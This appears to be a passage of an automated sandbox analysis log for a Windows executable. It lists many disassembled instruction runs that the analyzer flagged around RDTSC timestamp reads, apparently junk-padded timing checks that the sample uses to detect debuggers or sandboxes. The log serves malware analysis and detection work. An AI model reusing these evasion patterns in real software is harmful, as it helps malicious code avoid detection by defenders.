Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A35B4A second address: A35B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F77012B90EEh 0x0000000c pop edi 0x0000000d jnp 00007F77012B9103h 0x00000013 jmp 00007F77012B90F7h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A3639F second address: A363FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F77004F22C3h 0x0000000e jmp 00007F77004F22C9h 0x00000013 pop esi 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F77004F22C5h 0x0000001c jmp 00007F77004F22BFh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A363FC second address: A36402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A36B14 second address: A36B1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007F77004F22B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A4A007 second address: A4A00B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A4A00B second address: A4A025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F77004F22B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F77004F22BAh 0x00000012 push edx 0x00000013 pop edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A4A025 second address: A4A035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77012B90ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A4A035 second address: A4A039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A666F6 second address: A6672C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77012B90F6h 0x00000009 pop edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F77012B90F5h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A6672C second address: A66737 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F77004F22B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A668BA second address: A668BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A668BE second address: A668D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F77004F22B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A668D0 second address: A668D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A668D6 second address: A668DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A66A7E second address: A66A9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F77012B90E6h 0x00000009 jmp 00007F77012B90EFh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edi 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A66A9F second address: A66AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A67944 second address: A6794A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A6D35E second address: A6D362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A6CE93 second address: A6CEA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F77012B90E6h 0x0000000a jnc 00007F77012B90E6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A6CEA4 second address: A6CEB8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F77004F22B6h 0x0000000e jnp 00007F77004F22B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A6CEB8 second address: A6CEBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A6CEBC second address: A6CEC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A6CEC2 second address: A6CEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F77012B90F7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A6CEE3 second address: A6CF00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A6CF00 second address: A6CF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A6D036 second address: A6D067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F77004F22BEh 0x0000000d pop edi 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F77004F22C0h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A6D067 second address: A6D06B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A6EA44 second address: A6EA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77004F22BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A79090 second address: A79094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A78EEE second address: A78F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F77004F22C6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A78F0C second address: A78F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F77012B90EAh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jl 00007F77012B90E6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A78F25 second address: A78F33 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F77004F22B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A78F33 second address: A78F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A78F37 second address: A78F5C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F77004F22B6h 0x00000008 jmp 00007F77004F22C5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A78F5C second address: A78F69 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A8702B second address: A87035 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F77004F22B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A87035 second address: A87044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F77012B90E6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A8CFDC second address: A8CFE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A8CFE0 second address: A8CFF7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F77012B90EEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A8CFF7 second address: A8D055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77004F22C7h 0x00000009 popad 0x0000000a jng 00007F77004F22C1h 0x00000010 jmp 00007F77004F22BBh 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F77004F22C3h 0x0000001d jmp 00007F77004F22BAh 0x00000022 popad 0x00000023 popad 0x00000024 jl 00007F77004F22C6h 0x0000002a push edx 0x0000002b push ebx 0x0000002c pop ebx 0x0000002d pop edx 0x0000002e pushad 0x0000002f push eax 0x00000030 pop eax 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A8DA34 second address: A8DA38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A90B0F second address: A90B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edi 0x00000007 jmp 00007F77004F22C5h 0x0000000c pop edi 0x0000000d nop 0x0000000e mov edx, 69CE46DBh 0x00000013 push 00000004h 0x00000015 mov edx, dword ptr [ebp+122D31E2h] 0x0000001b push edx 0x0000001c pop edx 0x0000001d push 6765D1C2h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 pushad 0x00000026 popad 0x00000027 pop eax 0x00000028 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A9438C second address: A943B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F77012B90F6h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e jo 00007F77012B90F2h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D802D8 second address: 4D802DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D802DE second address: 4D801BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ret 0x0000000c nop 0x0000000d xor esi, eax 0x0000000f lea eax, dword ptr [ebp-10h] 0x00000012 push eax 0x00000013 call 00007F7705C35CCBh 0x00000018 mov edi, edi 0x0000001a jmp 00007F77012B90F7h 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 push esi 0x00000022 mov bx, A646h 0x00000026 pop ebx 0x00000027 mov dx, cx 0x0000002a popad 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F77012B90F1h 0x00000035 jmp 00007F77012B90EBh 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D801BC second address: 4D801D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77004F22C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D801D4 second address: 4D801EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop eax 0x00000011 mov dl, 21h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D801EE second address: 4D8021C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F77004F22BDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D8021C second address: 4D8022C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77012B90ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30029 second address: 4D3002E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3002E second address: 4D30052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77012B90EEh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F77012B90EAh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30052 second address: 4D30061 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30061 second address: 4D30085 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30085 second address: 4D30089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30089 second address: 4D3008F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3008F second address: 4D30095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30095 second address: 4D30099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30099 second address: 4D30131 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F77004F22C3h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 call 00007F77004F22C4h 0x00000016 pushfd 0x00000017 jmp 00007F77004F22C2h 0x0000001c adc si, D418h 0x00000021 jmp 00007F77004F22BBh 0x00000026 popfd 0x00000027 pop esi 0x00000028 call 00007F77004F22C9h 0x0000002d mov di, ax 0x00000030 pop ecx 0x00000031 popad 0x00000032 mov eax, dword ptr fs:[00000030h] 0x00000038 jmp 00007F77004F22C3h 0x0000003d sub esp, 18h 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30131 second address: 4D30135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30135 second address: 4D30139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30139 second address: 4D3013F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3013F second address: 4D30154 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30154 second address: 4D30171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30171 second address: 4D301E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 push ebx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F77004F22C2h 0x00000012 jmp 00007F77004F22C5h 0x00000017 popfd 0x00000018 pushfd 0x00000019 jmp 00007F77004F22C0h 0x0000001e sub cx, 1F28h 0x00000023 jmp 00007F77004F22BBh 0x00000028 popfd 0x00000029 popad 0x0000002a xchg eax, ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F77004F22C5h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D301E1 second address: 4D301E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D301E6 second address: 4D30239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebx, dword ptr [eax+10h] 0x0000000d pushad 0x0000000e jmp 00007F77004F22C5h 0x00000013 mov ah, 3Ah 0x00000015 popad 0x00000016 push ebp 0x00000017 pushad 0x00000018 mov cx, CEF5h 0x0000001c popad 0x0000001d mov dword ptr [esp], esi 0x00000020 jmp 00007F77004F22C7h 0x00000025 mov esi, dword ptr [772406ECh] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30239 second address: 4D3023D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3023D second address: 4D30243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30243 second address: 4D30259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30259 second address: 4D3025D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3025D second address: 4D30263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30263 second address: 4D30298 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F77004F33AFh 0x0000000f jmp 00007F77004F22C0h 0x00000014 xchg eax, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30298 second address: 4D302B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D302B5 second address: 4D302BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D302BB second address: 4D302BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D302BF second address: 4D302C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D302C3 second address: 4D3033A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F77012B90F4h 0x00000010 sub esi, 18AADAF8h 0x00000016 jmp 00007F77012B90EBh 0x0000001b popfd 0x0000001c mov ebx, esi 0x0000001e popad 0x0000001f xchg eax, edi 0x00000020 jmp 00007F77012B90F2h 0x00000025 call dword ptr [77210B60h] 0x0000002b mov eax, 766BE5E0h 0x00000030 ret 0x00000031 jmp 00007F77012B90F0h 0x00000036 push 00000044h 0x00000038 jmp 00007F77012B90F0h 0x0000003d pop edi 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 mov ax, 4993h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3033A second address: 4D30392 instructions: 0x00000000 rdtsc 0x00000002 mov bh, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cx, dx 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c jmp 00007F77004F22BAh 0x00000011 mov ebx, eax 0x00000013 popad 0x00000014 mov dword ptr [esp], edi 0x00000017 jmp 00007F77004F22BCh 0x0000001c push dword ptr [eax] 0x0000001e pushad 0x0000001f mov eax, 1BACDD1Dh 0x00000024 call 00007F77004F22BAh 0x00000029 pop edi 0x0000002a popad 0x0000002b mov eax, dword ptr fs:[00000030h] 0x00000031 pushad 0x00000032 mov ecx, 07DACF89h 0x00000037 mov cl, DBh 0x00000039 popad 0x0000003a push dword ptr [eax+18h] 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 mov si, ACF9h 0x00000044 push eax 0x00000045 pop edi 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30392 second address: 4D303A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77012B90EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3041B second address: 4D30478 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F77004F22BFh 0x00000015 xor ah, 0000006Eh 0x00000018 jmp 00007F77004F22C9h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F77004F22C0h 0x00000024 sbb cl, FFFFFFE8h 0x00000027 jmp 00007F77004F22BBh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
